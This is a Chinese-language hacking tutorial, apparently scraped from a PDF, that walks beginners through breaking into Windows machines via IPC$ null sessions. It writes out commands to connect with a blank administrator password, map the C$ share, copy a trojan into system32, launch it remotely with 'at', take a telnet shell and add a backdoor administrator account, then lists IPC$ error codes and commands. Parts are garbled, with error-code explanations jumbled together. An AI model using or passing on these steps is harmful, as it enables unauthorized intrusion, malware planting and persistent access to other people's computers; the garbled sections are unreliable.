如何利用IPC$漏洞入侵

1、 灌水 教你如何利用 IPC 漏洞入侵"高手勿进！ 新手请进！首先我用局网里的一台存在IPC$漏洞的电脑给大家进行一次IPC$经典模式入侵的演 示！看我用X_SCAN扫到了一台开放139端口并且ADMINISTRATOR用户密码为 空的电脑！当然大家也可以用IPCSCAN扫，这样速度会更快！OK!下面开始入侵首先和对 方建立IP C$连接： net use 192.168.0.8ipc$ /user:"administrator"OK!成功！新手注意了，这里密码为空，所以""/user:"admi ni strator"这里

2、我就只打两个引号！如果对方有密码的话，就需要在引号中输入密码即可！OK！现在我们可以用net use x: 192.168.0.8c$来映射对方的硬盘！看成功了，不过权限是GUEST权限，有复制，粘贴权限！ 现在我们可以传一个木马， 把他复制到 C:Docum开始菜单 程序 启动 中，如果对方机器从启之后木马会随系统自动启动的！这个方法由于要 等，所以我这里就不演示了！现在我就直接COPY个木马到对方的C盘的WINNTSYSTEM32目录下！OK，COPY 成功！命令如下：copy d:mu niu 192.168.0.8c$wi nn tsystem32好!既然我们已经COPY了木马过去现在

3、我们就要激活这个木马，我们才能完全入侵这台电脑啊！那要如何远程激活呢？总不可能跑到对方的电脑面前双击运行木马吧！（呵呵！） 这时候我们通常都用 at 命令！at 命令的意思是什么呢？ at 命令是计划任务命令，就是在特定的时候执行某种程序的命令，许 多有定时杀毒功能的杀毒软件就是通过这个命令来执行杀毒任务的。一般来说， 如果是默认安装windows 的话，计划任务是会处于启动形式的！OK！现在我们键入net tim e W192.168.0.8来获取对方电脑的时间，呵呵，对方的时间是下午04:00现在我们就用AT来激活木马，命令at W192.168.0.84:02 muniu.exe实际意思

4、就是 atip time 程序名好现在我们就等2分钟木马会自动运行！OK，时间到，我传过去的木马在运行后会自动开启对方的2 3端口 TELNET!现在我们来连接对方tel net 192.168.0.8看到没有我们成功的拿到对方的 cmd shell让我们看看权限是什么net user nick 123 /add（创建一个名为nick 的用户，密码为 12 3） 成功net localgroup administrators nick /add（把 nick用户添加到管理员组）成功，呵呵管理员权限！爽，后面你想做什么就随便你了！以上就是我入侵的全过程，呵呵，全无技术可言，希望大家不要笑话！下面

5、我给大家介绍一些关于IPC$的基础知识：什么是IPC$:IPC$和共享资源效果差不多。IPC$是共享 命名管道”的资源，它对于程序间的通讯很重要。 在远程管理计算机和查看计算机的共享资源时使用！注意只有 win2k 和 2k以上的系统才拥ipc$管道，在9 8等系统下是没有IPC$的，所以也不能用IPC$来入侵9 8等系统！在初次安装系统时还开了默认共享，即所有的逻辑（c$ d$ e$.） !所有这些，都是微软为了方便管理员的管理，但是无意中降低了系统的安全性！所以IPC$并不是一个真正意义上的漏洞！c$ d$ e$.是什么意思：呵呵，很简单这是系统默认共享，你可以看看自己的电脑，表面上没有共

6、享任何的东西，但是在IPC$中是这样的吗？在c md键入n et share 看到没有，尽管我的盘里面没有共享任何东西，但在IPC$里是全部共享的！这意味着如果对方知道我们的用户名密码，就可以轻而易举的把我做成他的肉鸡！1 3 94 4 5 端口！IPC$所使用的是什么端口：很明显IPC$以来于TCP一下是我个人总结的一些IPC$入侵中的错误！ 错误号5,拒绝访问：很可能你使用的用户权限不够错误号5 1. WINDOWS无法找到网络路径：网络有问题！lanmanworkstation 服务没有启错误号5 3,找不到网络路径：IP地址错误；目标未开机；目标有防火墙过滤了端口；目标删 除了IPC$

7、错误号6 7,找不到网络名：对方删除了IPC$或者你的动！ 错误号121 除其中一个 错误号13 RD错误 错误号17 动 错误号229，6，2，2，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个IPC$，请删未知的用户名或错误的密码：很明显你的USERNAME或者PASSWO试图登陆，但是网络登陆服务没有启动：目标的NETLOGO N服务没有启此用户的密码已经过期：对方有帐号策略，强制定期更改一次密码！还有我们常在COPY东西的时候岀现失败原因大概如下：1.你的用户权限不够2 .对方有病毒防火墙，把你的木马杀掉了3.对方没有开放默认共享IPC$常用命令：net share ipc$ （开放 IPC$ ）net share ipc$ /del （ 删除 IPC$ ）net share c= c: （开放对方C盘的默认共享）n et start tel net （开放对方的 tel net 服务）net user usernam e /add （添加用户）n et localgroup admi ni strators user n